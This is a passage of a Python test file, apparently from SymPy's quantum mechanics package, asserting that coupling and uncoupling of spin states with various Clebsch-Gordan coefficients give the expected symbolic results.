JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
def test_uncouple_2_coupled_states_numerical():
# j1=1/2, j2=1/2
assert (
uncouple(JzKetCoupled(0, 0, (S.Half, S.Half)))
== sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)))
/ 2
- sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half))
/ 2
)
assert uncouple(JzKetCoupled(1, 1, (S.Half, S.Half))) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half)))
== sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)))
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half))
/ 2
)
assert uncouple(JzKetCoupled(1, -1, (S.Half, S.Half))) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
)
# j1=1, j2=1/2
assert (
uncouple(JzKetCoupled(S.Half, S.Half, (1, S.Half)))
== -sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(S.Half, S.Half)) / 3
+ sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))) / 3
)
assert (
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half)))
== sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))) / 3
- sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(S.Half, S.Half)) / 3
)
assert uncouple(
JzKetCoupled(Rational(3, 2), Rational(3, 2), (1, S.Half))
) == TensorProduct(JzKet(1, 1), JzKet(S.Half, S.Half))
assert (
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)))
== sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))) / 3
+ sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(S.Half, S.Half)) / 3
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)))
== sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))) / 3
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(S.Half, S.Half)) / 3
)
assert uncouple(
JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half))
) == TensorProduct(JzKet(1, -1), JzKet(S.Half, Rational(-1, 2)))
# j1=1, j2=1
assert (
uncouple(JzKetCoupled(0, 0, (1, 1)))
== sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1)) / 3
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 3
)
assert (
uncouple(JzKetCoupled(1, 1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
- sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert (
uncouple(JzKetCoupled(1, 0, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, -1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
)
assert (
uncouple(JzKetCoupled(1, -1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 0)) / 2
)
assert uncouple(JzKetCoupled(2, 2, (1, 1))) == TensorProduct(
JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(2, 1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert (
uncouple(JzKetCoupled(2, 0, (1, 1)))
== sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(1, -1)) / 6
+ sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 6
)
assert (
uncouple(JzKetCoupled(2, -1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 0)) / 2
)
assert uncouple(JzKetCoupled(2, -2, (1, 1))) == TensorProduct(
JzKet(1, -1), JzKet(1, -1)
)
def test_uncouple_3_coupled_states_numerical():
# Default coupling
# j1=1/2, j2=1/2, j3=1/2
assert uncouple(
JzKetCoupled(Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half))
) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half)))
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
)
/ 3
)
assert (
uncouple(
JzKetCoupled(Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half))
)
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
/ 3
)
assert uncouple(
JzKetCoupled(Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half))
) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
# j1=1/2, j2=1/2, j3=1
assert uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, 1))) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, 1)))
== TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0))
/ 2
)
assert (
uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, 1)))
== sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 3
+ sqrt(6)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
/ 6
)
assert (
uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, 1)))
== sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
)
/ 2
)
assert uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, 1))) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
assert (
uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1)))
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
/ 2
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0))
/ 2
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1)))
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
/ 2
)
assert (
uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1)))
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
/ 2
)
# j1=1/2, j2=1, j3=1
assert uncouple(
JzKetCoupled(Rational(5, 2), Rational(5, 2), (S.Half, 1, 1))
) == TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1))
assert (
uncouple(JzKetCoupled(Rational(5, 2), Rational(3, 2), (S.Half, 1, 1)))
== sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1))
/ 5
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)) / 5
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(5, 2), S.Half, (S.Half, 1, 1)))
== sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1))
/ 5
+ sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0))
/ 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1))
/ 10
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1))
/ 10
)
assert (
uncouple(JzKetCoupled(Rational(5, 2), Rational(-1, 2), (S.Half, 1, 1)))
== sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 10
+ sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1))
/ 10
+ sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 5
+ sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(5, 2), Rational(-3, 2), (S.Half, 1, 1)))
== sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0))
/ 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1))
/ 5
+ sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)) / 5
)
assert uncouple(
JzKetCoupled(Rational(5, 2), Rational(-5, 2), (S.Half, 1, 1))
) == TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, -1))
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(3, 2), (S.Half, 1, 1)))
== -sqrt(30)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1))
/ 15
- 2
* sqrt(15)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1))
/ 15
+ sqrt(15) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, 1, 1)))
== -4
* sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1))
/ 15
+ sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0))
/ 15
- 2
* sqrt(10)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1))
/ 15
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(-1, 2), (S.Half, 1, 1)))
== -sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 5
- sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 15
+ 2
* sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1))
/ 15
- sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 15
+ 4
* sqrt(5)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1))
/ 15
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(-3, 2), (S.Half, 1, 1)))
== -sqrt(15)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0))
/ 5
+ 2
* sqrt(15)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1))
/ 15
+ sqrt(30)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1))
/ 15
)
assert (
uncouple(JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1)))
== TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1)) / 3
- TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)) / 3
+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)) / 6
- sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, 1, 1)))
== sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 2
- sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 3
+ sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1))
/ 6
- TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 3
+ TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)) / 3
)
# j1=1, j2=1, j3=1
assert uncouple(JzKetCoupled(3, 3, (1, 1, 1))) == TensorProduct(
JzKet(1, 1), JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(3, 2, (1, 1, 1)))
== sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)) / 3
)
assert (
uncouple(JzKetCoupled(3, 1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 15
)
assert (
uncouple(JzKetCoupled(3, 0, (1, 1, 1)))
== sqrt(10) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)) / 5
+ sqrt(10) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 10
)
assert (
uncouple(JzKetCoupled(3, -1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 15
)
assert (
uncouple(JzKetCoupled(3, -2, (1, 1, 1)))
== sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)) / 3
)
assert uncouple(JzKetCoupled(3, -3, (1, 1, 1))) == TensorProduct(
JzKet(1, -1), JzKet(1, -1), JzKet(1, -1)
)
assert (
uncouple(JzKetCoupled(2, 2, (1, 1, 1)))
== -sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)) / 6
- sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)) / 6
+ sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)) / 3
)
assert (
uncouple(JzKetCoupled(2, 1, (1, 1, 1)))
== -sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 3
)
assert (
uncouple(JzKetCoupled(2, 0, (1, 1, 1)))
== -TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(2, -1, (1, 1, 1)))
== -sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 3
- sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 6
)
assert (
uncouple(JzKetCoupled(2, -2, (1, 1, 1)))
== -sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)) / 3
+ sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)) / 6
+ sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)) / 6
)
assert (
uncouple(JzKetCoupled(1, 1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 30
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 15
- sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)) / 30
- sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 5
)
assert (
uncouple(JzKetCoupled(1, 0, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 10
- sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 10
- 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 10
- sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 10
)
assert (
uncouple(JzKetCoupled(1, -1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 5
- sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)) / 30
- sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 30
)
# Defined j13
# j1=1/2, j2=1/2, j3=1, j13=1/2
assert (
uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1))))
== -sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
/ 3
+ sqrt(3)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0))
/ 3
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1))))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 3
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 6
+ sqrt(3)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
/ 3
)
assert (
uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1))))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
/ 3
)
# j1=1/2, j2=1, j3=1, j13=1/2
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -sqrt(6)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1))
/ 3
+ sqrt(3) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)) / 3
)
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -2
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1))
/ 3
- TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)) / 3
